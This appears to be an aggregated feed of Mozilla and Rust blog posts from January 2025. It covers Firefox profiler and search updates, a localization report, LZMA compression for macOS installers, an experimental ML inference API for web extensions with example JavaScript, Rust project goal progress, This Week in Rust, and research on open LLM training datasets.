  • We added a new way to filter the profile to include only the data related to the tab you’re interested in, via a new tab selector. You can find it by clicking the “Full Profile” button in the top left corner. This allows web and Gecko developers to focus on a single website.
    • [Screenshot: a dropdown selector above the tracks in the Firefox Profiler UI, listing “All tabs and windows”, then “browser”, followed by individual domains such as www.mozilla.org and www.google.com.]
  • We implemented a new way to control the profiler using POSIX signals on macOS and Linux. You can send SIGUSR1 to the Firefox main process to start the profiler and SIGUSR2 to stop and dump the profile to disk. We hope that this feature will be useful for cases where Firefox is completely frozen and using the usual profiler buttons is not an option. See our documentation here.
  • Lots of performance work to make the profiler itself faster.

Search and Navigation

Scotch Bonnet

  • Mandy enhanced restricted search keywords so that users can use both their own localized language and the English shortcut Bug 1933003
  • Daisuke fixed an issue where pressing ctrl+shift+tab while the Unified Search Button was enabled and the address bar is focused would not go to the previous tab Bug 1931915
  • Daisuke also fixed an issue where focusing the urlbar with a click and pressing shift tab wouldn’t focus the Unified Search Button Bug 1933251
  • Daisuke enabled keyboard focus of the Unified Search Button via Shift + Tab after focusing the address bar with Ctrl + L Bug 1937363
  • Daisuke changed the behavior of the Unified Search Button to show when editing a URL instead of initial focus Bug 1936090
  • Lots of other papercuts fixed by the team

Search

  • Mandy initiated the removal of old application-provided search engine WebExtensions from users’ profiles, as they are no longer required thanks to search-config-v2 Bug 1885953

Suggest

  • Drew implemented a new simplified UI treatment for Weather Suggestions Bug 1938517
  • Drew removed the Suggest JS Backend as the Rust based backend was enabled by default in 124 Bug 1932502

Storybook/Reusable Components

  • Anna Kulyk added new --table-row-background-color and --table-row-background-color-alternate design tokens Bug 1919313
  • Anna Kulyk added support for the panel-item disabled attribute Bug 1919122

Mozilla Localization (L10N)L10n report: January 2025 Edition

Please note some of the information provided in this report may be subject to change as we are sometimes sharing information about projects that are still in early stages and are not final yet. 

Welcome!

Are you a locale leader and want us to include new members in our upcoming reports? Contact us!

New content and projects

What’s new or coming up in Firefox desktop

Tab Groups

Tab groups are now available in Nightly 136! To create a group in Nightly, all you have to do is have two tabs open, click and drag one tab to the other, pause a sec and then drop. From there the tab group editor window will appear where you can name the group and give it a color. After saving, the group will appear on your tab bar.

Once you create a group, you can easily access your groups from the overflow menu on the right.

These work great with the sidebar and vertical tabs features that were released in Firefox Labs in Nightly 131!

New profile selector

The new profile selector which we have been localizing over the previous months is now starting to roll out gradually to users in Nightly 136. SUMO has an excellent article about all the new changes which you can find here.

What’s new or coming up in web projects

AMO and AMO Frontend

The team is planning to migrate/copy the Spanish (es) locale into four: es-AR, es-CL, es-ES, and es-MX. Per the community managers’ input, all locales will retain the suggestions that have not been approved at the time of migration. Be on the lookout for the changes in the upcoming week(s).

Mozilla Accounts

The Mozilla accounts team recently landed strings used in three emails planned to be sent over the course of 90 days, with the first happening in the coming weeks. These will be sent to inactive users who have not logged in or interacted with the Mozilla accounts service in 2 years, letting them know their account and data may be deleted.

What’s new or coming up in SUMO

The CX team is still working on 2025 planning. In the meantime, read a recap from our technical writer, Lucas Siebert, about how 2024 went in this blog post. We will also have a community call coming up on Feb 5th at 5 PM UTC. Check out the agenda for more detail; we’d love to see you there!

Last but not least, we will be at FOSDEM 2025. Mozilla’s booth will be at the K building, level 1. Would love to see you if you’re around!

What’s new or coming up in Pontoon

New Email Features

We’re excited to announce two new email features that will keep you better informed and connected with your localization work on Pontoon:

Email Notifications: Opt in to receive notifications via email, ensuring you stay up to date with important events even when you’re away from the platform. You can choose between daily or weekly digests and subscribe to specific notification types only.

Monthly Activity Summary: If enabled, you’ll receive an email summary at the start of each month, highlighting your personal activity and key activities within your teams for the previous month.

Visit your settings to explore and activate these features today!

New Translation Memory tools are here!

If you are a locale manager or translator, here’s what you can do from the new TM tab on your team page:

  • Search, edit, and delete Translation Memory entries with ease.
  • Upload .TMX files to instantly share your Translation Memories with your team.

These tools are here to save you time and boost the quality of suggestions from Machinery. Dive in and explore the new features today!

Moving to GitHub Discussions

Feedback, support and conversations on new Pontoon developments have moved from Discourse to GitHub Discussions. See you there!

Newly published localizer facing documentation

Events

Come check out our end-of-year presentation on Pontoon! A YouTube link and an AirMozilla link are available.

Want to showcase an event coming up that your community is participating in? Contact us and we’ll include it.

Friends of the Lion

Know someone in your l10n community who’s been doing a great job and should appear here? Contact us and we’ll make sure they get a shout-out!

Useful Links

Questions? Want to get involved?

If you want to get involved, or have any question about l10n, reach out to:

Did you enjoy reading this report? Let us know how we can improve it.

Firefox NightlyFirefox on macOS: now smaller and quicker to install!

Firefox is typically installed on macOS by downloading a DMG (Disk iMaGe) file and dragging the Firefox.app into /Applications. These DMG files are compressed to reduce download time. As of Firefox 136, we’re making an under-the-hood change to them, switching from bzip2 to lzma compression, which shrinks their size by ~9% and cuts decompression time by ~50%.

Why now?

If you’re familiar with macOS packaging, you’ll know that LZMA support was introduced in macOS 10.15, back in 2019. However, Firefox continued to support older versions of macOS until Firefox 116.0 was released in August 2023, which meant that we couldn’t use it prior to then.

But that still raises the question: why wait ~18 months to realize these improvements? Answering that question requires a bit of explanation of how we package Firefox…

Packaging Firefox for macOS… on Linux!

Most DMGs are created with hdiutil, a standard tool that ships with macOS. hdiutil is a fine tool, but unfortunately, it only runs natively on macOS. This is a problem for us, because we package Firefox thousands of times per day, and it is impractical to maintain a fleet of macOS machines large enough to support this. Instead, we use libdmg-hfsplus, a third-party tool that runs on Linux, to create our DMGs. This allows us to scale these operations as much as needed for a fraction of the cost.

Why now, redux

Until recently, our fork of libdmg-hfsplus only supported bzip2 compression, which of course made it impossible for us to use lzma. Thanks to some recent efforts by Dave Vasilevsky, a wonderful volunteer who previously added bzip2 support, it now supports lzma compression.

We quietly enabled this for Firefox Nightly in 135.0, and now that it’s had some bake time there, we’re confident that it’s ready to be shipped on Beta and Release.

Why LZMA?

DMGs support many types of compression: bzip2, zlib, lzfse and lzma being the most notable. Each of these has strengths and weaknesses:

  • bzip2 has the best compression (in terms of size) that is supported on all macOS versions, but the slowest decompression
  • zlib has very fast decompression, at the cost of increased package size
  • lzfse has the fastest decompression, but the second largest package size
  • lzma has the second fastest decompression and the best compression in terms of size, at the cost of increased compression times

With all of this in mind, we chose lzma to make improvements on both download size and installation time.

You may wonder why download size is an important consideration, seeing as fast broadband connections are common these days. This may be true in many places, but not everyone has the benefits of a fast unmetered connection. Reducing download size has an outsized impact for users with slow connections, or those who pay for each gigabyte used.

What does this mean for you?

Absolutely nothing! Other than a quicker installation, you should see no changes to the Firefox install experience.

Of course, edge cases exist and bugs are possible. If you do notice something that you think may be related to this change please file a bug or post on discourse to bring it to our attention.

Get involved!

If you’d like to be like Dave, and contribute to Firefox development, take a look at codetribute.mozilla.org. Whether you’re interested in automation and tools, the Firefox frontend, the JavaScript engine, or many other things, there’s an opportunity waiting just for you!

Mozilla Addons BlogAnnouncing the WebExtensions ML API

Greetings extension developers!

We wanted to highlight this just-published blog post from our AI team where they share some exciting news – we’re shipping a new experimental ML API in Firefox that will allow developers to leverage our AI Runtime to run offline machine learning tasks in their web extensions.

Head on over to Mozilla’s AI blog to learn more. After you’ve had a chance to check it out, we encourage you to share feedback, comments, or questions over on the Mozilla AI Discord (invite link).

Happy coding!

The post Announcing the WebExtensions ML API appeared first on Mozilla Add-ons Community Blog.

The Rust Programming Language BlogDecember Project Goals Update

Over the last six months, the Rust project has been working towards a slate of 26 project goals, with 3 of them designated as Flagship Goals. This post provides a final update on our progress towards these goals (or, in some cases, lack thereof). We are currently finalizing plans for the next round of project goals, which will cover 2025H1. The full details for any particular goal are available in its associated tracking issue on the rust-project-goals repository.

Flagship goals

Our big goal for this period was async closures, and we are excited to announce that work there is done! Support for async closures was stabilized on nightly on Dec 12, and it will be included in Rust 1.85, which ships on Feb 20. Big kudos to compiler-errors for driving that.

For our other goals, we made progress, but there remains work to be done:

  • Return Type Notation (RTN) is implemented and we had a call for experimentation but it has not yet reached stable. This will be done as part of our 2025H1 goal.
  • Async Functions in Traits (and Return Position Impl Trait in Trait) are currently not considered dyn compatible. We would eventually like to have first-class dyn support, but as an intermediate step we created a procedural macro crate dynosaur[1] that can create wrappers that enable dynamic dispatch. We are planning a comprehensive blog post in 2025H1 that shows how to use this crate and lays out the overall plan for async functions in traits.
  • Work was done to prototype an implementation for async drop, but we didn’t account for reviewing bandwidth. nikomatsakis has done initial reads and is working with the PR author to get this done in 2025H1. To be clear, though, the scope of this is an experiment with the goal of uncovering implementation hurdles. There remains significant language design work before this feature would be considered for stabilization (we don’t even have an RFC, and there are lots of unknowns remaining).
  • We have had fruitful discussions about the trait for async iteration but do not have widespread consensus; that’s on the docket for 2025H1.

We largely completed our goal to stabilize the language features used by the Rust for Linux project. In some cases a small amount of work remains. Over the last six months, we...

  • stabilized the offset_of! macro to get the offset of fields;
  • almost stabilized the CoercePointee trait -- but discovered that the current implementation was revealing unstable details, which is currently being resolved;
  • put up the asm_goto stabilization PR and reference updates, excluding the “output” feature;
  • completed the majority of the work for arbitrary self types, which is being used by RfL and just needs documentation before stabilization.

We also began work on compiler flag stabilization with RFC 3716, which outlines a scheme for stabilizing flags that modify the target ABI.

Big shout-outs to Ding Xiang Fei, Alice Ryhl, Adrian Taylor, and Gary Guo for doing the lion's share of the work here.

The final release of Rust 2024 is confirmed for February 20, 2025 as part of Rust 1.85. Rust 1.85 is currently in beta. Feedback from the nightly beta and crater runs has been actively addressed, with adjustments to migrations and documentation to enhance user experience.

Big shout-outs to TC and Eric Huss for their hard work driving this program forward.

Final goal updates

Over the last six months a number of internal refactorings have taken place that are necessary to support a min_generic_const_args prototype.

One refactoring is that we have changed how we represent const arguments in the compiler to allow for adding a separate representation for the kinds of const arguments that min_generic_const_args will add.

Another big refactoring is that we have changed the API surface of our representation of const arguments in the type system layer: there is no longer a way to evaluate a const argument without going through our general-purpose type system logic. This was necessary to ensure that we correctly handle equality for the kinds of const arguments that min_generic_const_args will support.

With all of these pre-requisite refactorings completed, a feature gate has been added to the compiler (feature(min_generic_const_args)) that uses the new internal representation of const arguments. We are now beginning to implement the actual language changes under this feature gate.

Shout-out to camelid, boxy and compiler-errors.

Over the course of the last six months...

  • cargo semver-checks began to include generic parameters and bounds in its schema, allowing for more precise lints;
  • cargo manifest linting was implemented and merged, allowing for lints that look at the cargo manifest;
  • building on cargo manifest linting, the feature_missing lint was added, which identifies breakage caused by the removal of a package feature.

In addition, we fleshed out a design sketch for the changes in rustdoc's JSON support that are needed to support cross-crate item linting. This in turn requires compiler extensions to supply that information to rustdoc.

  • Progress was made on adding const traits and their implementation in the compiler, with improvements being carefully considered. Add was constified in rust#133237 and Deref/DerefMut in rust#133260.
  • Further progress was made on implementing stability for the const traits feature in rust#132823 and rust#133999, with additional PRs constifying more traits open at rust#133995 and rust#134628.
  • Over the last six months, we created a lang-team experiment devoted to this issue and spastorino began work on an experimental implementation. joshtriplett authored RFC 3680, which has received substantial feedback. The current work is focused on identifying "cheaply cloneable" types and making it easy to create closures that clone them instead of moving them.
  • Alternatives to sandboxed build scripts are going to be investigated instead of continuing this project goal into 2025h1 - namely, declaratively configuring system dependencies with system-deps, using an approach similar to code-checker Cackle and its sandbox environment Bubblewrap, or fully-sandboxed build environments like Docker or Nix.
  • Significant speedups have been achieved, reducing the slowest crate resolution time from over 120 seconds to 11 seconds, and decreasing the time to check all crates from 178 minutes to 71.42 minutes.
  • Performance improvements have been made to both the existing resolver and the new implementation, with the lock file verification time for all crates reduced from 44.90 minutes to 32.77 minutes (excluding some of the hardest cases).
  • Our pull request that adds example searches and a search button has been added to the agenda for the rustdoc team’s next meeting.
  • The -Znext-solver=coherence feature is now stable in version 1.84, with a new update blog post published.
  • Significant progress was made on bootstrap with -Znext-solver=globally. We're now able to compile rustc and cargo, enabling try-builds and perf runs.
  • An optimisation for the #[clippy::msrv] lint is open, benchmarked, and currently under review.
  • Help is needed on any issue marked with performance-project, especially on issue #13714.
  • Over the course of this goal, Nadrieril wrote and posted the never patterns RFC as an attempt to make progress without figuring out the whole picture, and the general feedback was “we want to see the whole picture”. The next step will be to write up an RFC that includes a clear proposal for which empty patterns can and cannot be omitted. This is 100% bottlenecked on Nadrieril’s writing bandwidth (reach out if you want to help!). Work will continue, but the goal won’t be resubmitted for 2025h1.
  • Amanda has made progress on removing placeholders, focusing on lazy constraints and early error reporting, as well as investigating issues with rewriting type tests; a few tests are still failing, and it seems error reporting and diagnostics will be hard to keep exactly as they are today.
  • @lqd has opened PRs to land the prototype of the location-sensitive analysis. It's working well enough that it's worthwhile to land; there is still a lot of work left to do, but it's a major milestone, which we hoped to achieve with this project goal.
  • A fix stopping cargo-script from overriding the release profile was posted and merged.
  • Help is wanted for writing frontmatter support in rustc, as rustfmt folks are requesting it to be represented in the AST.
  • The RFC is done and waiting for all rustdoc team members to take a look before implementation can start.
  • SparrowLii proposed a 2025H1 project goal to continue stabilizing the parallel front end, focusing on solving reproducible deadlock issues and improving parallel compilation performance.
  • The team discussed solutions to avoid potential deadlocks, finding that disabling work-stealing in rayon's subloops is effective, and will incorporate related modifications in a PR.
  • Progress on annotate-snippets continued despite a busy schedule, with a focus on improving suggestions and addressing architectural challenges.
  • A new API was designed in collaboration with epage, aiming to align annotate-snippets more closely with rustc for easier contribution and integration.
  • The project goal slate for 2025h1 has been posted as an RFC and is waiting on approval from project team leads.
  • Another pull request was merged, with only one remaining before a working MVP is available on nightly.
  • Some features were removed to simplify upstreaming and will be added back as single PRs.
  • Work will start on the batching feature of LLVM/Enzyme, which allows array-of-structs and struct-of-arrays vectorization.
  • There has been a push to add an AMD GPU target to the compiler, which would have been needed for the LLVM offload project.
  • We have written and verified around 220 safety contracts in the verify-rust-std fork.
  • 3 out of 14 challenges have been solved.
  • We have successfully integrated Kani in the repository CI, and we are working on the integration of 2 other verification tools: VeriFast and Goto-transcoder (ESBMC)
  • There wasn't any progress on this goal, but building a community around a-mir-formality is still a goal and future plans are coming.

Goals without updates

The following goals have not received updates in the last month:

[1]: As everyone knows, the hardest part of computer science is naming. I think we rocked this one.

The Mozilla BlogRunning inference in web extensions

[Image generated by DALL·E from the prompt: “A person standing on a platform in the ocean, surrounded by big waves. They are holding a sail with a big Firefox logo on it. Make it like Hokusai’s The Great Wave off Kanagawa print and make sure the boat looks like it can actually stay afloat.”]

We’re shipping a new API in Firefox Nightly that will let you use our Firefox AI runtime to run offline machine learning tasks in your web extension.

Firefox AI Runtime

We’ve recently shipped a new component inside of Firefox that leverages Transformers.js (a JavaScript equivalent of Hugging Face’s Transformers Python library) and the underlying ONNX runtime engine. This component lets you run any machine learning model that is compatible with Transformers.js in the browser, with no server-side calls beyond the initial download of the models. This means Firefox can run everything on your device and avoid sending your data to third parties.

Web applications can already use Transformers.js in vanilla JavaScript (a sketch follows the list below), but running it through our platform offers some key benefits:

  • The inference runtime is executed in a dedicated, isolated process, for safety and robustness
  • Model files are stored using IndexedDB and shared across origins
  • Firefox-specific performance improvements are done to accelerate the runtime
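
For comparison, here is a minimal sketch of that vanilla approach using the Transformers.js pipeline API (the package name and defaults are as published by Hugging Face; treat the specifics as assumptions):

import { pipeline } from "@huggingface/transformers";

// Downloads the default summarization model on first use, then runs locally.
const summarizer = await pipeline("summarization");
const output = await summarizer("Some long text to shorten…");
console.log(output[0].summary_text);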

This platform shipped in Firefox 133 to provide alt text for images in PDF.js, and will be used in several other places in Firefox 134 and beyond to improve the user experience.

We also want to unblock the community’s ability to experiment with these capabilities. Starting later today, developers will be able to access a new trial “ml” API in Firefox Nightly. This API is basically a thin wrapper around Firefox’s internal API, but with a few additional restrictions for user privacy and security.

There are two major differences between this API and most other WebExtensions APIs: the API is highly experimental and permission to use it must be requested after installation.

This new API is virtually guaranteed to change in the future. To help set developer expectations, the “ml” API is exposed under the “browser.trial” namespace rather than directly on the “browser” global object. Any API exposed on “browser.trial” may not be compatible across major versions of Firefox. Developers should guard against breaking changes using a combination of feature detection and strict_min_version declarations. You can see a more detailed description of how to write extensions with it in our documentation.
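
For example, a guard along these lines (a minimal sketch; the exact namespace shape may change between Nightly versions) lets an extension degrade gracefully when the API is absent:

// Feature-detect the experimental API before using it; pair this with a
// strict_min_version declaration in manifest.json.
function mlApiAvailable() {
  return typeof browser !== "undefined" &&
    typeof browser.trial?.ml?.createEngine === "function";
}

if (mlApiAvailable()) {
  // Safe to call browser.trial.ml.* from here.
} else {
  // Hide or disable the ML-powered feature.
}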

Running an inference task

Performing inference directly in the browser is quite exciting. We expect people will be able to build compelling features using the browser’s data locally.

Like the original Transformers that inspired it, Transformers.js uses “tasks” to abstract away implementation details for performing specific kinds of ML workloads. You can find a description of all tasks that Transformers.js supports in the project’s official documentation.

For our first iteration, Firefox exposes the following tasks:

  • text-classification – assigning a label or class to a given text
  • token-classification – assigning a label to each token in a text
  • question-answering – retrieving the answer to a question from a given text
  • fill-mask – masking some of the words in a sentence and predicting which words should replace those masks
  • summarization – producing a shorter version of a document while preserving its important information
  • translation – converting text from one language to another
  • text2text-generation – converting one text sequence into another text sequence
  • text-generation – producing new text by predicting the next word in a sequence
  • zero-shot-classification – classifying text into classes that are unseen during training
  • image-to-text – outputting text from a given image
  • image-classification – assigning a label or class to an entire image
  • image-segmentation – dividing an image into segments where each pixel is mapped to an object
  • zero-shot-image-classification – classifying images into classes that are unseen during training
  • object-detection – identifying objects of certain defined classes within an image
  • zero-shot-object-detection – identifying objects of classes that are unseen during training
  • document-question-answering – answering questions on a document image
  • image-to-image – transforming a source image to match the characteristics of a target image or a target image domain
  • depth-estimation – predicting the depth of objects present in an image
  • feature-extraction – transforming raw data into numerical features that can be processed while preserving the information in the original dataset
  • image-feature-extraction – transforming raw data into numerical features that can be processed while preserving the information in the original image

For each task, we’ve selected a default model; see the list in EngineProcess.sys.mjs on Searchfox. These curated models are all stored in our Model Hub at https://model-hub.mozilla.org/. A “model hub” is Hugging Face’s term for an online store of models; see The Model Hub. Whether used by Firefox itself or an extension, models are automatically downloaded on first use and cached.

Below is an example showing how to run a summarizer in your extension with the default model:

async function summarize(text) {
  // Create the engine for the task; on first use this downloads and caches
  // the default summarization model.
  await browser.trial.ml.createEngine({taskName: "summarization"});
  // Run inference; the result follows Transformers.js pipeline output.
  const result = await browser.trial.ml.runEngine({args: [text]});
  return result[0]["summary_text"];
}

If you want to use another model, you can use any model published on Hugging Face by Xenova or the Mozilla organization. For now, model downloads are restricted to those two organizations, but we might relax this limitation in the future.

To use an allow-listed model from Hugging Face, set the “modelHub” option to “huggingface” and the “taskName” option to the appropriate task when creating an engine.

Let’s modify the previous example to use a model that can summarize larger texts:

async function summarize(text) {
  await browser.trial.ml.createEngine({
    taskName: "summarization",
    modelHub: "huggingface",
    modelId: "Xenova/long-t5-tglobal-base-16384-book-summary"
  });
  const result = await browser.trial.ml.runEngine({args: [text]});
  return result[0]["summary_text"];
}

Our PDF.js alt text feature follows the same pattern (sketched after the list):

  • Gets the image to describe
  • Use the “image-to-text” task with the “mozilla/distilvit” model
  • Run the inference and return the generated text
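
A hedged sketch of that pattern with the extension API (the option names mirror the summarization examples above; the "generated_text" output key follows Transformers.js conventions and is an assumption here):

async function altTextFor(imageUrl) {
  // "image-to-text" with the model that the PDF.js alt text feature uses.
  await browser.trial.ml.createEngine({
    taskName: "image-to-text",
    modelId: "mozilla/distilvit"
  });
  // Run inference on the image and return the generated description.
  const result = await browser.trial.ml.runEngine({args: [imageUrl]});
  return result[0]["generated_text"];
}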

This feature is built directly into Firefox, but we’ve also made a web extension example out of it, which you can find in our source code and use as a basis to build your own: https://searchfox.org/mozilla-central/source/toolkit/components/ml/docs/extensions-api-example. For instance, it includes some code to request the relevant permission, and a model download progress bar.
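
For instance, the permission request might look roughly like this (a sketch assuming the permission is named "trialML", as in the example extension; note that permissions.request must be called from a user gesture, such as a button click):

// Ask the user to grant access to the experimental ML API.
document.querySelector("#enable-ml").addEventListener("click", async () => {
  const granted = await browser.permissions.request({
    permissions: ["trialML"]
  });
  if (granted) {
    // The browser.trial.ml API can now be used.
  }
});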

We’d love to hear from you

This API is our first attempt to enable the community to build on the top of our Firefox AI Runtime. We want to make this API as simple and powerful as possible.

We believe that offering this feature to web extensions developers will help us learn and understand if and how such an API could be developed as a web standard in the future.

We’d love to hear from you and see what you are building with this.

Come and say hi in #firefox-ai on our dedicated Mozilla AI Discord. Invitation link: https://discord.gg/Jmmq9mGwy7

Last but not least, we’re giving a deep-dive talk at FOSDEM in the Mozilla room on Sunday, February 2nd in Brussels. There will be many interesting talks in that room; see https://fosdem.org/2025/schedule/track/mozilla/

The post Running inference in web extensions appeared first on The Mozilla Blog.

This Week In RustThis Week in Rust 583

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tag us at @ThisWeekInRust on X (formerly Twitter) or @ThisWeekinRust on mastodon.social, or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub and archives can be viewed at this-week-in-rust.org. If you find any errors in this week's issue, please submit a PR.

Want TWIR in your inbox? Subscribe here.

Updates from Rust Community

Official
Newsletters
Project/Tooling Updates
Observations/Thoughts
Rust Walkthroughs
Miscellaneous

Crate of the Week

This week's crate is resvg, an SVG rendering library.

Thanks to David Mason for the suggestion!

Please submit your suggestions and votes for next week!

Calls for Testing

An important step for RFC implementation is for people to experiment with the implementation and give feedback, especially before stabilization. The following RFCs would benefit from user testing before moving forward:

RFCs
  • No calls for testing were issued this week.
Rust
  • No calls for testing were issued this week.
Rustup
  • No calls for testing were issued this week.

If you are a feature implementer and would like your RFC to appear on the above list, add the new call-for-testing label to your RFC along with a comment providing testing instructions and/or guidance on which aspect(s) of the feature need testing.

Call for Participation; projects and speakers

CFP - Projects

Always wanted to contribute to open-source projects but did not know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here or through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

CFP - Events

Are you a new or experienced speaker looking for a place to share something cool? This section highlights events that are being planned and are accepting submissions to join their event as a speaker.

If you are an event organizer hoping to expand the reach of your event, please submit a link to the website through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

Updates from the Rust Project

397 pull requests were merged in the last week

Rust Compiler Performance Triage

A very quiet week for performance, with small improvements essentially on all benchmarks.

Triage done by @simulacrum. Revision range: 1ab85fbd..9a1d156f

0 Regressions, 1 Improvement, 2 Mixed; 0 of them in rollups. 40 artifact comparisons made in total.

Full report here

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

Final Comment Period

Every week, the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs
Tracking Issues & PRs
Rust
Cargo
  • No Cargo Tracking Issues or PRs entered Final Comment Period this week.
Language Team
  • No Language Team Proposals entered Final Comment Period this week.
Language Reference
  • No Language Reference RFCs entered Final Comment Period this week.
Unsafe Code Guidelines
  • No Unsafe Code Guideline Tracking Issues or PRs entered Final Comment Period this week.
New and Updated RFCs

Upcoming Events

Rusty Events between 2025-01-22 - 2025-02-19 🦀

Virtual
Europe
North America
Oceania

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Jobs

Please see the latest Who's Hiring thread on r/rust

Quote of the Week

Memory safety issues mean you can’t trust what you’re seeing in your source code anymore.

Someone from Antithesis on the shuttle blog

Thanks to scottmcm for the suggestion!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, cdmistman, ericseppanen, extrawurst, U007D, joelmarcey, mariannegoldin, bennyvasquez, bdillo

Email list hosting is sponsored by The Rust Foundation

Discuss on r/rust

The Rust Programming Language BlogRust 2024 in beta channel

The Mozilla BlogSupercharge your day: Firefox features for peak productivity


Hi, I’m Tapan. As the leader of Firefox’s Search and AI efforts, my mission is to help users find what they are looking for on the web and stay focused on what truly matters. Outside of work, I indulge my geek side by building giant Star Wars Lego sets and sharing weekly leadership insights through my blog, Building Blocks. These hobbies keep me grounded and inspired as I tackle the ever-evolving challenges of the digital world.

I’ve always been fascinated by the internet — its infinite possibilities, endless rabbit holes and the wealth of knowledge just a click away. But staying focused online can feel impossible. I spend my days solving user problems, crafting strategies, and building products that empower people to navigate the web more effectively. Yet, even I am not immune to the pull of distraction. Let me paint you a picture of my daily online life. It’s a scene many of you might recognize: dozens of tabs open, notifications popping up from every corner, and a long to-do list staring at me. In this chaos, I’ve learned that staying focused requires intention and the right tools.

Over the years, I have discovered several Firefox features that are absolute game-changers for staying productive online:

1. Pinned Tabs: Anchor your essentials

Pinned Tabs get me to my most essential tabs in one click. I keep a few persistent pinned tabs (my email, calendar, and files) and a few “daily” pinned tabs for the day’s must-dos. This is my secret weapon for keeping my workspace organized. Pinned Tabs stay put and don’t clutter the tab bar, making it easy to switch between key resources without hunting through my tab list.

To pin a tab, right-click it and select “Pin Tab.” Now, your essential tabs will always be at your fingertips.

2. Search: Use the fast lane

The “@” shortcut is my productivity superpower, taking me to search results in a flash. By typing “@amazon,” “@bing,” or “@history” followed by your search terms, you can instantly search those platforms or your browsing history without leaving your current page. This saves me time by letting me jump right to search results.

In the next Firefox update, we are making the search term persist in the address bar, so that you can refine your searches for supported sites right from there.

To search supported sites, type “@” in the address bar and pick any engine from the supported list.

3. AI-powered summarization: Cut to the chase

This is one of my favorite recent additions to Firefox. Our AI summarization feature can distill long articles or documents into concise summaries, helping you grasp the key points without wading through endless text. Recently, I used Firefox’s AI summarization to condense sections of research papers on AI. This helped me quickly grasp the key findings and apply them to our strategy discussions for enhancing Firefox’s AI features. Using AI to help build AI!

To use AI-powered summarization, type “about:preferences#experimental” in the address bar and enable “AI chatbot.” Pick your favorite chatbot and sign in. Select any text on a page you wish to summarize and right-click to pick “Ask <your chatbot>.” We are adding new capabilities to this list with every release.

4. Close Duplicate Tabs: Declutter your workspace

If you are like me, you’ve probably opened the same webpage multiple times without realizing it. Firefox’s “Close Duplicate Tabs” feature eliminates this problem.

By clicking the tab list icon at the top-right corner of the Firefox window, you can detect and close duplicate tabs, keeping your workspace clean and reducing mental load. This small but mighty tool is for anyone prone to tab overload.

5. Reader View: Eliminate distractions

Reader View transforms cluttered web pages into clean, distraction-free layouts. By stripping away ads, pop-ups, and other distractions, it lets you focus entirely on the content. Whether you’re reading an article or doing research, this feature keeps your mind on the task.

To enable it, click the Reader View icon in the address bar when viewing a page.

These Firefox features have transformed how I navigate the web, helping me stay focused, productive, and in control of my time online. Whether managing a complex task, diving into research, or just trying to stay on top of your daily tasks, these tools can help you take charge of your browsing experience.

What are your favorite Firefox productivity tips? I would love to hear how you customize Firefox to fit your life.

Let’s make the web work for us!

Get Firefox

Get the browser that protects what’s important

The post Supercharge your day: Firefox features for peak productivity appeared first on The Mozilla Blog.

The Mozilla BlogMozilla, EleutherAI publish research on open datasets for LLM training

[Photo: participants of the Dataset Convening standing together in Amsterdam.]

Update: Following the 2024 Mozilla AI Dataset Convening, AI builders and researchers have published best practices for creating open datasets for LLM training.


Training datasets behind large language models (LLMs) often lack transparency. A research paper published by Mozilla and EleutherAI explores how openly licensed datasets that are responsibly curated and governed can make the AI ecosystem more equitable. The study is co-authored with thirty leading scholars and practitioners from prominent open source AI startups, nonprofit AI labs, and civil society organizations who attended the Dataset Convening on open AI datasets in June 2024.

Many AI companies rely on data crawled from the web, frequently without the explicit permission of copyright holders. While some jurisdictions like the EU and Japan permit this under specific conditions, the legal landscape in the United States remains murky. This lack of clarity has led to lawsuits and a trend toward secrecy in dataset practices, stifling transparency and accountability and limiting innovation to those who can afford it.

For AI to truly benefit society, it must be built on foundations of transparency, fairness, and accountability—starting with the most foundational building block that powers it: data. 

The research, “Towards Best Practices for Open Datasets for LLM Training,” outlines possible tiers of openness, normative principles, and technical best practices for sourcing, processing, governing, and releasing open datasets for LLM training, as well as opportunities for policy and technical investments to help the emerging community overcome its challenges. 

READ THE RESEARCH HERE

Building toward a responsible AI future requires collaboration across legal, technical, and policy domains, along with investments in metadata standards, digitization, and fostering a culture of openness. 

To help advance the field, the paper compiles best practices for LLM builders, including guidance on Encoding preferences in metadata, Data sourcing, Data Processing, Data Governance/Release, and Terms of Use.

To explore the recommendations, check the full paper (also available on arXiv).

We are grateful to our collaborators – 273 Ventures, Ada Lovelace Institute, Alan Turing Institute, Cohere For AI, Common Voice, Creative Commons, Data Nutrition Project, Data Provenance Initiative, First Languages AI Reality (Mila), Gretel, HuggingFace, LLM360, Library Innovation Lab (Harvard), Open Future, Pleias, Spawning, The Distributed AI Research Institute, Together AI, and Ushahidi– for their leadership in this work, as well as Computer Says Maybe for their facilitation support. 

We look forward to the conversations it will spark.


Previous post published on July 2, 2024:

Mozilla and EleutherAI brought together experts to discuss a critical question: How do we create openly licensed and open-access LLM training datasets and how do we tackle the challenges faced by their builders?

On June 11, on the eve of MozFest House in Amsterdam, Mozilla and EleutherAI convened an exclusive group of 30 leading scholars and practitioners from prominent open-source AI startups, nonprofit AI labs and civil society organizations to discuss emerging practices for a new focus within the open LLM community: creating open-access and openly licensed LLM training datasets.

This work is timely. Although sharing training datasets was once common practice among many AI actors, increased competitive pressures and legal risks have made it almost unheard of nowadays for pre-training datasets to be shared or even described by their developers. However, just as open-source software has made the internet safer and more robust, we at Mozilla and EleutherAI believe open-access data is a public good that can empower developers worldwide to build upon each other’s work. It fosters competition, innovation and transparency, providing clarity around legal standing and an ability to stand up to scrutiny.

